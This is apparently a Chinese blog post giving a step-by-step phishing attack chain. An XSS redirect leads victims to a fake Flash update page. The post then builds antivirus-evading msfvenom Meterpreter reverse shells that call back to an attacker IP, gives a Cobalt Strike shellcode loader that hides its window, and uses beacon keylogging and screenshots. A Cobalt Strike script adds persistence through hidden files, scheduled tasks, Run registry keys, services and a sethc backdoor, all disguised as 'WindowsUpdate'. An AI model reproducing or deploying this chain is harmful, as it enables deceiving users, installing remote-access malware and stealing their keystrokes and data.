---
title: XSS钓鱼
date:  2020-01-21
tags: 
  - XSS
categories: Web
---

利用XSS跳转至伪造的Flash下载界面下载构造好的免杀马

### XSS构造

url跳转

```html
<script>
alert("您的当前的Flash Player版本过低,为确保正常使用此功能,请安装更高版本的Flash Player");
window.location.href="http://xxxxx/flash.html";
</script>
```

提示版本过低并跳转至下载界面

flash.html内容从 https://www.flash.cn/ 中copy

### MSF免杀马

生成普通远控马

```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.168 LPORT=12345 -f exe > msf.exe
```

普通的马很容易就被检测并被删除

```shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.153.168 lport=11206 -f exe > msf.exe
```

-e选择制定编码器,-i编码次数,-b去除多余/坏字符,编码次数越多，Payload字符越多

(PS:编码次数太多也会被检测，例如火绒会直接检测出代码混淆器)

![img](XSS钓鱼/clipboard.png)

可选择多种编码方式，使用如下命令可列出支持的编码

```shell
msfvenom -l encoders
```

编译后修改图标为Flash图标

![img](XSS钓鱼/clipboard-1579597875940.png)

msf开启监听

```shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.153.168
set lport 11206
exploit
```

### **使用CobaltStrike**

在攻击中选择

![img](XSS钓鱼/clipboard-1579597912088.png)

生成Python的Payload(python2)

```python
from ctypes import *
import ctypes
# length: 891 bytes
buf = "xxx" 
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
   buf = c_char_p(buffer)
   size = len(buffer)
   addr = libc.valloc(size)
   addr = c_void_p(addr)
   if 0 == addr: 
       raise Exception("Failed to allocate memory")
   memmove(addr, buf, size)
   if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
       raise Exception("Failed to set protection on buffer")
   return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
      if 666==666:
             ctypes.windll.user32.ShowWindow(whnd, 0)   
             ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                       ctypes.c_int(len(shellcode)),
                                         ctypes.c_int(0x3000),
                                         ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                    buf,
                                    ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
```

生成Payload.exe

![img](XSS钓鱼/clipboard-1579597942833.png)

CobaltStrike进入beacon

执行sleep 0

等待时间设为0

screenshoot 截图，可在视图的屏幕截图查看

![img](XSS钓鱼/clipboard-1579597953802.png)

keylogger 键盘记录 可在视图的键盘记录查看

![img](XSS钓鱼/clipboard-1579597961374.png)

脚本管理器可以加载脚本

这里用到了PrivilegeHelper.cna

文件内容

```cna
popup beacon_bottom {
	menu "权限维持" {

		item "设置路径" {
			local('$bid');
			foreach $bid ($1){
				prompt_text("filePath", $filePath, {
					$filePath = $1;
					return $filePath;
				});
			}
		}


		item "隐藏文件" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "attrib \"$filePath\" +s +h");
			}
		}


		item "定时任务" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "schtasks /create /tn WindowsUpdate /tr \"$filePath\" /sc minute /mo 1");
			}
		}

		item "注册表"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"$filePath\" /f");
			}
		}

		item "SC服务"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "sc create \"WindowsUpdate\" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"WindowsUpdate\" start= auto&&net start WindowsUpdate");

			}
		}

		item "shift启动"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "takeown /f C:\\windows\\system32\\sethc.* /a /r /d y&&cacls C:\\windows\\system32\\sethc.exe /T /E /G system:F&&copy \"$filePath\" C:\\windows\\system32\\sethc.exe /y");
			}
		}

		item "自启动目录"{
			local('$bid');
			foreach $bid ($1){
				bshell($1, "copy \"$filePath\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" /y");
				bshell($1, "attrib \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" +s +h");
			}
		}

		item "懒人攻略" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "attrib \"$filePath\" +s +h");
				bshell($1, "schtasks /create /tn WindowsUpdate /tr \"$filePath\" /sc minute /mo 1");
				bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"$filePath\" /f");
				bshell($1, "sc create \"WindowsUpdate\" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"WindowsUpdate\" start= auto&&net start WindowsUpdate");
				bshell($1, "takeown /f C:\\windows\\system32\\sethc.* /a /r /d y&&cacls C:\\windows\\system32\\sethc.exe /T /E /G system:F&&copy \"$filePath\" C:\\windows\\system32\\sethc.exe /y");
				bshell($1, "copy \"$filePath\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" /y");
				bshell($1, "attrib \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" +s +h");

			}

		}


	}
}
```

#### 隐藏文件

> **attrib** 命令是对文件或文件夹添加或删除属性, 文件添加和删除文件属性, 可以该变一个文件的执行状态, 比如一个文本文档 ( xxx.txt ) 将这个 xxx.txt 设为只读属性, 那这个文件就无法进行写入, 只可以读取,  ----百度百科

attrib可以改变文件及文件夹的属性

```cmd
attrib /?
显示或更改文件属性。

ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [+O | -O] [+I | -I] [+X | -X] [+P | -P] [+U | -U]
       [drive:][path][filename] [/S [/D]] [/L]

  +   设置属性。
  -   清除属性。
  R   只读文件属性。
  A   存档文件属性。
  S   系统文件属性。
  H   隐藏文件属性。
  O   脱机属性。
  I   无内容索引文件属性。
   X   无清理文件属性。
  V   完整性属性。
  P   固定属性。
  U   非固定属性。
  [drive:][path][filename]
      指定属性要处理的文件。
  /S  处理当前文件夹及其所有子文件夹中
      的匹配文件。
  /D  也处理文件夹。
  /L  处理符号链接和
      符号链接目标的属性
```

很容易看出来

```cmd
attrib filename +s +h
```

是为一个文件加上系统文件属性同时设置为隐藏

此时只有使用

```cmd
dir /ah
```

才可以看到隐藏文件

![img](XSS钓鱼/clipboard-1579598025374.png)

#### 定时任务

> schtasks 是安排命令和程序定期运行或在指定时间内运行。从计划表中添加和删除任务，按需要启动和停止任务，显示和更改计划任务。

```cmd
schtasks /?

SCHTASKS /parameter [arguments]

描述:
    允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任
    务。

参数列表:
    /Create         创建新计划任务。

    /Delete         删除计划任务。

    /Query          显示所有计划任务。

    /Change         更改计划任务属性。

    /Run            按需运行计划任务。

    /End            中止当前正在运行的计划任务。

    /ShowSid        显示与计划的任务名称相应的安全标识符。

    /?              显示此帮助消息。

Examples:
    SCHTASKS
    SCHTASKS /?
    SCHTASKS /Run /?
    SCHTASKS /End /?
    SCHTASKS /Create /?
    SCHTASKS /Delete /?
    SCHTASKS /Query  /?
    SCHTASKS /Change /?
    SCHTASKS /ShowSid /?
```

```cmd
SCHTASKS /Create /?
    /TN   taskname     以路径\名称形式指定
                       对此计划任务进行唯一标识的字符串。

    /TR   taskrun      指定在这个计划时间运行的程序的路径
                       和文件名。
                       例如: C:\windows\system32\calc.exe
    /MO   modifier     改进计划类型以允许更好地控制计划重复
                       周期。有效值列于下面“修改者”部分中。  
 /RU/XML    /SC   schedule     指定计划频率。
                       有效计划任务:  MINUTE、 HOURLY、DAILY、WEEKLY、
                       MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.
修改者: 按计划类型的 /MO 开关的有效值:
    MINUTE:  1 到 1439 分钟。
    HOURLY:  1 - 23 小时。
    DAILY:   1 到 365 天。
    WEEKLY:  1 到 52 周。
    ONCE:    无修改者。
    ONSTART: 无修改者。
    ONLOGON: 无修改者。
    ONIDLE:  无修改者。
    MONTHLY: 1 到 12，或
             FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY。

    ONEVENT:  XPath 事件查询字符串。       
```

```cmd
schtasks /create /tn WindowsUpdate /tr filePath /sc minute /mo 1
```

即为创建计划任务"WindowsUpdate",每分钟运行filepath

#### 注册表

```cmd
reg add /?

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
        [/reg:32 | /reg:64]

  KeyName  [\\Machine\]FullKey
           Machine  远程机器名 - 忽略默认到当前机器。远程机器上
                    只有 HKLM 和 HKU 可用。
           FullKey  ROOTKEY\SubKey
           ROOTKEY  [ HKLM | HKCU | HKCR | HKU | HKCC ]
           SubKey   所选 ROOTKEY 下注册表项的完整名称。

  /v       所选项之下要添加的值名称。

  /ve      为注册表项添加空白值名称(默认)。

  /t       RegKey 数据类型
           [ REG_SZ    | REG_MULTI_SZ | REG_EXPAND_SZ |
             REG_DWORD | REG_QWORD    | REG_BINARY    | REG_NONE ]
           如果忽略，则采用 REG_SZ。

  /s       指定一个在 REG_MULTI_SZ 数据字符串中用作分隔符的字符
           如果忽略，则将 "\0" 用作分隔符。

  /d       要分配给添加的注册表 ValueName 的数据。

  /f       不用提示就强行覆盖现有注册表项。
```

```cmd
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d filePath /f
```

则为为

```cmd
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
```

强制添加一个值为filename的数据

而HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run是控制计算机启动项的注册表信息

#### sc创建服务

```cmd
描述:
        SC 是用来与服务控制管理器和服务进行通信
        的命令行程序。
用法:
        sc <server> [command] [service name] <option1> <option2>...
```

```cmd
sc create "WindowsUpdate" binpath= "cmd /c start C:\test.exe";
sc config "WindowsUpdate" start= auto
net start WindowsUpdate
```

因为本地测试失败了就没深入探究